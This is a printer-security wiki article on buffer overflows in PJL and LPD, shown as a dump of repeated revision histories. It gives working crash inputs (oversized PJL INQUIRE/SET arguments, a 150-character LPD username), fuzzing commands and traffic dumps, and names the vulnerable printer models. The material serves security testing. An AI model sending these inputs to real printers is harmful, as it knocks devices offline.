cfA001. < 00 . > 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 0a 00 xxxxxxx.. '''How to test for this attack?''' A simple LPD fuzzer to test for buffer overflows can be created using the ''lpdtest'' tool included in [[PRET]]. The <code>in</code> argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output): <syntaxhighlight lang=sh> ./lpdtest.py printer in "`python -c 'print "x"*150'`" </syntaxhighlight> '''Who can perform this attack?''' Anyone who can access the LPD daemon through a network. Note that a web attacker can only exploit this flaw if cross-protocol scripting to port 515/tcp is allowed by the web browser (for example, Internet Explorer 10). Most browsers however block access to the LPD port by default (see [[Cross site printing]]). ------------- b981bddf762df5c5e72d4cdaf516884cbff487ca 182 181 2017-01-21T11:58:51Z Admin 1 /* LPD daemon */ wikitext text/x-wiki While the risk of [https://en.wikipedia.org/wiki/Buffer_overflow buffer overflows] is well-known <ref>''[http://phrack.org/issues/49/14.html Smashing The Stack For Fun And Profit]'', Aleph One, Phrack magazine #49, 1996, p. 14-16</ref> and not limited to printers, it must be noted that printers provide additional languages and network services, potentially prone to this kind of attack. Exploitation may lead to denial of service or – given correct shellcode and return address – even to remote code execution. Buffer overflows are particularly dangerous on embedded devices, as they may have no protection mechanisms like [https://en.wikipedia.org/wiki/Address_space_layout_randomization ASLR], [https://en.wikipedia.org/wiki/NX_bit NX/DEP] or user separation, so all executed code is run as superuser. == PJL input == [[PJL]] processors may be vulnerable to buffer overflows if the given input exceeds the buffer size. For example, various ''Lexmark'' laser printers crash when when receiving about 1.000 characters as the ''INQUIRE'' argument (see [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619 CVE-2010-0619]): @PJL INQUIRE 00000000000000000000000000000000000000000000000000000… Sending about 3.000 characters as the ''SET'' argument to the ''Dell 1720n'' crashes the device and requires a manual restart to get the printer back to life: @PJL SET 000000000000000000000000000000000000000000000000000000000… '''How to test for this attack?''' Buffer overflows in PJL input can be tested using [[PRET]]'s ''flood'' command which sends large amounts of data to all arguments specified in the PJL reference <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997</ref> and all PJL variables dynamically retrieved from the system: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> flood Buffer size: 10000, Sending: @PJL SET [buffer] Buffer size: 10000, Sending: @PJL [buffer] Buffer size: 10000, Sending: @PJL COMMENT [buffer] Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer] Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]" Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]" Buffer size: 10000, Sending: @PJL INFO [buffer] Buffer size: 10000, Sending: @PJL ECHO [buffer] Buffer size: 10000, Sending: @PJL INQUIRE [buffer] Buffer size: 10000, Sending: @PJL DINQUIRE [buffer] Buffer size: 10000, Sending: @PJL USTATUS [buffer] Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]" Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]" Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]" '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == LPD daemon == The [[LPD]] protocol seems particularly interesting when testing for buffer overflows, because it allows multiple user-defined vectors like ''jobname'', ''username'' or ''hostname'', which may not be sufficiently protected. Sending more characters than allowed by the LPD specification <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref> may result in an overflow. For example, receiving 150 characters and more as ''username'' operator of the control file's <code>L</code> command (''print banner page'') completely crashes the ''HP LaserJet 1200'', the ''HP LaserJet 4200N'', the ''HP LaserJet 4250N'', the ''Dell 3110cn'', the ''Kyocera FS-C5200DN'' as well as the ''Samsung MultiPress 6345N'' and requires a manual restart to get the printers back to life. A network traffic dump for this attack is given below: > 02 6c 70 0a .lp. < 00 . > 02 31 35 32 20 63 66 41 30 30 31 0a .152 cfA001. < 00 . > 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 0a 00 xxxxxxx.. '''How to test for this attack?''' A simple LPD fuzzer to test for buffer overflows can be created using the ''lpdtest'' tool included in PRET. The <code>in</code> argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output): <syntaxhighlight lang=sh> ./lpdtest.py printer in "`python -c 'print "x"*150'`" </syntaxhighlight> '''Who can perform this attack?''' Anyone who can access the LPD daemon through a network. Note that a web attacker can only exploit this flaw if cross-protocol scripting to port 515/tcp is allowed by the web browser (for example, Internet Explorer 10). Most browsers however block access to the LPD port by default (see [[Cross site printing]]). ------------- 40dbf535934d776cee530f28eeceb60827c20707 181 168 2017-01-21T11:52:23Z Admin 1 /* LPD daemon */ wikitext text/x-wiki While the risk of [https://en.wikipedia.org/wiki/Buffer_overflow buffer overflows] is well-known <ref>''[http://phrack.org/issues/49/14.html Smashing The Stack For Fun And Profit]'', Aleph One, Phrack magazine #49, 1996, p. 14-16</ref> and not limited to printers, it must be noted that printers provide additional languages and network services, potentially prone to this kind of attack. Exploitation may lead to denial of service or – given correct shellcode and return address – even to remote code execution. Buffer overflows are particularly dangerous on embedded devices, as they may have no protection mechanisms like [https://en.wikipedia.org/wiki/Address_space_layout_randomization ASLR], [https://en.wikipedia.org/wiki/NX_bit NX/DEP] or user separation, so all executed code is run as superuser. == PJL input == [[PJL]] processors may be vulnerable to buffer overflows if the given input exceeds the buffer size. For example, various ''Lexmark'' laser printers crash when when receiving about 1.000 characters as the ''INQUIRE'' argument (see [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619 CVE-2010-0619]): @PJL INQUIRE 00000000000000000000000000000000000000000000000000000… Sending about 3.000 characters as the ''SET'' argument to the ''Dell 1720n'' crashes the device and requires a manual restart to get the printer back to life: @PJL SET 000000000000000000000000000000000000000000000000000000000… '''How to test for this attack?''' Buffer overflows in PJL input can be tested using [[PRET]]'s ''flood'' command which sends large amounts of data to all arguments specified in the PJL reference <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997</ref> and all PJL variables dynamically retrieved from the system: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> flood Buffer size: 10000, Sending: @PJL SET [buffer] Buffer size: 10000, Sending: @PJL [buffer] Buffer size: 10000, Sending: @PJL COMMENT [buffer] Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer] Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]" Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]" Buffer size: 10000, Sending: @PJL INFO [buffer] Buffer size: 10000, Sending: @PJL ECHO [buffer] Buffer size: 10000, Sending: @PJL INQUIRE [buffer] Buffer size: 10000, Sending: @PJL DINQUIRE [buffer] Buffer size: 10000, Sending: @PJL USTATUS [buffer] Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]" Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]" Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]" '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == LPD daemon == The [[LPD]] protocol seems particularly interesting when testing for buffer overflows, because it allows multiple user-defined vectors like ''jobname'', ''username'' or ''hostname'', which may not be sufficiently protected. Sending more characters than allowed by the LPD specification <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref> may result in an overflow. For example, receiving 150 characters and more as ''username'' operator of the control file's <code>L</code> command (''print banner page'') completely crashes the ''HP LaserJet 1200'', the ''HP LaserJet 4200N'', the ''HP LaserJet 4250N'', the ''Dell 3110cn'', the ''Kyocera FS-C5200DN'' as well as the ''Samsung MultiPress 6345N'' and requires a manual restart to get the printers back to life. '''How to test for this attack?''' A simple LPD fuzzer to test for buffer overflows can be created using the ''lpdtest'' tool included in PRET. The <code>in</code> argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output): <syntaxhighlight lang=sh> ./lpdtest.py printer in "`python -c 'print "x"*150'`" </syntaxhighlight> Network traffic: > 02 6c 70 0a \hspace{189pt} .lp. < 00 . > 02 31 35 32 20 63 66 41 30 30 31 0a \hspace{59.5pt} .152 cfA001. < 00 . > 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 0a 00 \hspace{108pt} xxxxxxx.. '''Who can perform this attack?''' Anyone who can access the LPD daemon through a network. Note that a web attacker can only exploit this flaw if cross-protocol scripting to port 515/tcp is allowed by the web browser (for example, Internet Explorer 10). Most browsers however block access to the LPD port by default (see [[Cross site printing]]). ------------- 42bbc0910f86521759cc7557dd6576de38760b49 168 135 2017-01-20T16:20:27Z Admin 1 wikitext text/x-wiki While the risk of [https://en.wikipedia.org/wiki/Buffer_overflow buffer overflows] is well-known <ref>''[http://phrack.org/issues/49/14.html Smashing The Stack For Fun And Profit]'', Aleph One, Phrack magazine #49, 1996, p. 14-16</ref> and not limited to printers, it must be noted that printers provide additional languages and network services, potentially prone to this kind of attack. Exploitation may lead to denial of service or – given correct shellcode and return address – even to remote code execution. Buffer overflows are particularly dangerous on embedded devices, as they may have no protection mechanisms like [https://en.wikipedia.org/wiki/Address_space_layout_randomization ASLR], [https://en.wikipedia.org/wiki/NX_bit NX/DEP] or user separation, so all executed code is run as superuser. == PJL input == [[PJL]] processors may be vulnerable to buffer overflows if the given input exceeds the buffer size. For example, various ''Lexmark'' laser printers crash when when receiving about 1.000 characters as the ''INQUIRE'' argument (see [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619 CVE-2010-0619]): @PJL INQUIRE 00000000000000000000000000000000000000000000000000000… Sending about 3.000 characters as the ''SET'' argument to the ''Dell 1720n'' crashes the device and requires a manual restart to get the printer back to life: @PJL SET 000000000000000000000000000000000000000000000000000000000… '''How to test for this attack?''' Buffer overflows in PJL input can be tested using [[PRET]]'s ''flood'' command which sends large amounts of data to all arguments specified in the PJL reference <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997</ref> and all PJL variables dynamically retrieved from the system: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> flood Buffer size: 10000, Sending: @PJL SET [buffer] Buffer size: 10000, Sending: @PJL [buffer] Buffer size: 10000, Sending: @PJL COMMENT [buffer] Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer] Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]" Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]" Buffer size: 10000, Sending: @PJL INFO [buffer] Buffer size: 10000, Sending: @PJL ECHO [buffer] Buffer size: 10000, Sending: @PJL INQUIRE [buffer] Buffer size: 10000, Sending: @PJL DINQUIRE [buffer] Buffer size: 10000, Sending: @PJL USTATUS [buffer] Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]" Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]" Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]" '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == LPD daemon == The [[LPD]] protocol seems particularly interesting when testing for buffer overflows, because it allows multiple user-defined vectors like ''jobname'', ''username'' or ''hostname'', which may not be sufficiently protected. Sending more characters than allowed by the LPD specification <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref> may result in an overflow. For example, receiving 150 characters and more as ''username'' operator of the control file's <code>L</code> command (''print banner page'') completely crashes the ''HP LaserJet 1200'', the ''HP LaserJet 4200N'', the ''HP LaserJet 4250N'', the ''Dell 3110cn'', the ''Kyocera FS-C5200DN'' as well as the ''Samsung MultiPress 6345N'' and requires a manual restart to get the printers back to life. '''How to test for this attack?''' A simple LPD fuzzer to test for buffer overflows can be created using the ''lpdtest'' tool included in PRET. The <code>in</code> argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output): $ ./lpdtest.py printer in "`python -c 'print "x"*150'`" > 02 6c 70 0a \hspace{189pt} .lp. < 00 . > 02 31 35 32 20 63 66 41 30 30 31 0a \hspace{59.5pt} .152 cfA001. < 00 . > 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 0a 00 \hspace{108pt} xxxxxxx.. '''Who can perform this attack?''' Anyone who can access the LPD daemon through a network. Note that a web attacker can only exploit this flaw if cross-protocol scripting to port 515/tcp is allowed by the web browser (for example, Internet Explorer 10). Most browsers however block access to the LPD port by default (see [[Cross site printing]]). ------------- b361f31b76f17664fe99af7b11eee92016690731 135 111 2017-01-14T20:02:09Z Admin 1 wikitext text/x-wiki While the risk of [https://en.wikipedia.org/wiki/Buffer_overflow buffer overflows] is well-known <ref>''[http://phrack.org/issues/49/14.html Smashing The Stack For Fun And Profit]'', Aleph One, Phrack magazine #49, 1996, p. 14-16</ref> and not limited to printers, it must be noted that printers provide additional languages and network services, potentially prone to this kind of attack. Exploitation may lead to denial of service or – given correct shellcode and return address – even to remote code execution. Buffer overflows are particularly dangerous on embedded devices, as they may have no protection mechanisms like [https://en.wikipedia.org/wiki/Address_space_layout_randomization ASLR], [https://en.wikipedia.org/wiki/NX_bit NX/DEP] or user separation, so all executed code is run as superuser. == PJL input == [[PJL]] processors may be vulnerable to buffer overflows if the given input exceeds the buffer size. For example, various ''Lexmark'' laser printers crash when when receiving about 1.000 characters as the ''INQUIRE'' argument (see [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619 CVE-2010-0619]): @PJL INQUIRE 00000000000000000000000000000000000000000000000000000… Sending about 3.000 characters as the ''SET'' argument to the ''Dell 1720n'' crashes the device and requires a manual restart to get the printer back to life: @PJL SET 000000000000000000000000000000000000000000000000000000000… '''How to test for this attack?''' Buffer overflows in PJL input can be tested using PRET's ''flood'' command which sends large amounts of data to all arguments specified in the PJL reference <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997</ref> and all PJL variables dynamically retrieved from the system: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> flood Buffer size: 10000, Sending: @PJL SET [buffer] Buffer size: 10000, Sending: @PJL [buffer] Buffer size: 10000, Sending: @PJL COMMENT [buffer] Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer] Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]" Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]" Buffer size: 10000, Sending: @PJL INFO [buffer] Buffer size: 10000, Sending: @PJL ECHO [buffer] Buffer size: 10000, Sending: @PJL INQUIRE [buffer] Buffer size: 10000, Sending: @PJL DINQUIRE [buffer] Buffer size: 10000, Sending: @PJL USTATUS [buffer] Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]" Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]" Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]" '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == LPD daemon == The [[LPD]] protocol seems particularly interesting when testing for buffer overflows, because it allows multiple user-defined vectors like ''jobname'', ''username'' or ''hostname'', which may not be sufficiently protected. Sending more characters than allowed by the LPD specification <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref> may result in an overflow. For example, receiving 150 characters and more as ''username'' operator of the control file's <code>L</code> command (''print banner page'') completely crashes the ''HP LaserJet 1200'', the ''HP LaserJet 4200N'', the ''HP LaserJet 4250N'', the ''Dell 3110cn'', the ''Kyocera FS-C5200DN'' as well as the ''Samsung MultiPress 6345N'' and requires a manual restart to get the printers back to life. '''How to test for this attack?''' A simple LPD fuzzer to test for buffer overflows can be created using the ''lpdtest'' tool included in PRET. The <code>in</code> argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output): $ ./lpdtest.py printer in "`python -c 'print "x"*150'`" > 02 6c 70 0a \hspace{189pt} .lp. < 00 . > 02 31 35 32 20 63 66 41 30 30 31 0a \hspace{59.5pt} .152 cfA001. < 00 . > 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 0a 00 \hspace{108pt} xxxxxxx.. '''Who can perform this attack?''' Anyone who can access the LPD daemon through a network. Note that a web attacker can only exploit this flaw if cross-protocol scripting to port 515/tcp is allowed by the web browser (for example, Internet Explorer 10). Most browsers however block access to the LPD port by default (see [[Cross site printing]]). ------------- 33bd52d2e41c6ac91d5fbd8c2149063507886545 111 110 2017-01-14T17:40:02Z 134.147.128.156 0 wikitext text/x-wiki While the risk of [https://en.wikipedia.org/wiki/Buffer_overflow buffer overflows] is well-known <ref>''[http://phrack.org/issues/49/14.html Smashing The Stack For Fun And Profit]'', Aleph One, Phrack magazine #49, 1996, p. 14-16</ref> and not limited to printers, it must be noted that printers provide additional languages and network services, potentially prone to this kind of attack. Exploitation may lead to denial of service or – given correct shellcode and return address – even to remote code execution. Buffer overflows are particularly dangerous on embedded devices, as they may have no protection mechanisms like [https://en.wikipedia.org/wiki/Address_space_layout_randomization ASLR], [https://en.wikipedia.org/wiki/NX_bit NX/DEP] or user separation, so all executed code is run as superuser. == PJL input == [[PJL]] processors may be vulnerable to buffer overflows if the given input exceeds the buffer size. For example, various ''Lexmark'' laser printers crash when when receiving about 1.000 characters as the ''INQUIRE'' argument (see [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619 CVE-2010-0619]): @PJL INQUIRE 00000000000000000000000000000000000000000000000000000… Sending about 3.000 characters as the ''SET'' argument to the ''Dell 1720n'' crashes the device and requires a manual restart to get the printer back to life: @PJL SET 000000000000000000000000000000000000000000000000000000000… '''How to test for this attack?''' Buffer overflows in PJL input can be tested using PRET's ''flood'' command which sends large amounts of data to all arguments specified in the PJL reference <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997</ref> and all PJL variables dynamically retrieved from the system: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> flood Buffer size: 10000, Sending: @PJL SET [buffer] Buffer size: 10000, Sending: @PJL [buffer] Buffer size: 10000, Sending: @PJL COMMENT [buffer] Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer] Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]" Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]" Buffer size: 10000, Sending: @PJL INFO [buffer] Buffer size: 10000, Sending: @PJL ECHO [buffer] Buffer size: 10000, Sending: @PJL INQUIRE [buffer] Buffer size: 10000, Sending: @PJL DINQUIRE [buffer] Buffer size: 10000, Sending: @PJL USTATUS [buffer] Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]" Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]" Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]" '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == LPD daemon == The [[LPD]] protocol seems particularly interesting when testing for buffer overflows, because it allows multiple user-defined vectors like ''jobname'', ''username'' or ''hostname'', which may not be sufficiently protected. Sending more characters than allowed by the LPD specification <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref> may result in an overflow. For example, receiving 150 characters and more as ''username'' operator of the control file's <code>L</code> command (''print banner page'') completely crashes the ''HP LaserJet 1200'', the ''HP LaserJet 4200N'', the ''HP LaserJet 4250N'', the ''Dell 3110cn'', the ''Kyocera FS-C5200DN'' as well as the ''Samsung MultiPress 6345N'' and requires a manual restart to get the printers back to life. '''How to test for this attack?''' A simple LPD fuzzer to test for buffer overflows can be created using the ''lpdtest'' tool included in PRET. The <code>in</code> argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output): $ ./lpdtest.py printer in "`python -c 'print "x"*150'`" > 02 6c 70 0a \hspace{189pt} .lp. < 00 . > 02 31 35 32 20 63 66 41 30 30 31 0a \hspace{59.5pt} .152 cfA001. < 00 . > 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 0a 00 \hspace{108pt} xxxxxxx.. '''Who can perform this attack?''' Anyone who can access the LPD daemon through a network. Note that a web attacker can only exploit this flaw if cross-protocol scripting to port 515/tcp is allowed by the web browser (for example, Internet Explorer 10). Most browsers however block access to the LPD port by default (see [[Cross site printing]]). ------------- c99322fc4cd0b774c51168e6d22814c861841c2d 110 109 2017-01-14T17:33:51Z 134.147.128.156 0 /* How to test this attack? */ wikitext text/x-wiki While the risk of [https://en.wikipedia.org/wiki/Buffer_overflow buffer overflows] is well-known <ref>''[http://phrack.org/issues/49/14.html Smashing The Stack For Fun And Profit]'', Aleph One, Phrack magazine #49, 1996, p. 14-16</ref> and not limited to printers, it must be noted that printers provide additional languages and network services, potentially prone to this kind of attack. Exploitation may lead to denial of service or – given correct shellcode and return address – even to remote code execution. Buffer overflows are particularly dangerous on embedded devices, as they may have no protection mechanisms like [https://en.wikipedia.org/wiki/Address_space_layout_randomization ASLR], [https://en.wikipedia.org/wiki/NX_bit NX/DEP] or user separation, so all executed code is run as superuser. == PJL input == [[PJL]] processors may be vulnerable to buffer overflows if the given input exceeds the buffer size. For example, various ''Lexmark'' laser printers crash when when receiving about 1.000 characters as the ''INQUIRE'' argument (see [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619 CVE-2010-0619]): @PJL INQUIRE 00000000000000000000000000000000000000000000000000000… Sending about 3.000 characters as the ''SET'' argument to the ''Dell 1720n'' crashes the device and requires a manual restart to get the printer back to life: @PJL SET 000000000000000000000000000000000000000000000000000000000… === How to test this attack? === Buffer overflows in PJL input can be tested using PRET's ''flood'' command which sends large amounts of data to all arguments specified in the PJL reference <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997</ref>: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> flood Buffer size: 10000, Sending: @PJL SET [buffer] Buffer size: 10000, Sending: @PJL [buffer] Buffer size: 10000, Sending: @PJL COMMENT [buffer] Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer] Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]" Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]" Buffer size: 10000, Sending: @PJL INFO [buffer] Buffer size: 10000, Sending: @PJL ECHO [buffer] Buffer size: 10000, Sending: @PJL INQUIRE [buffer] Buffer size: 10000, Sending: @PJL DINQUIRE [buffer] Buffer size: 10000, Sending: @PJL USTATUS [buffer] Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]" Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]" Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]" === Who can perform this attack? === Any anyone who can print, for example through [[USB drive or cable]], 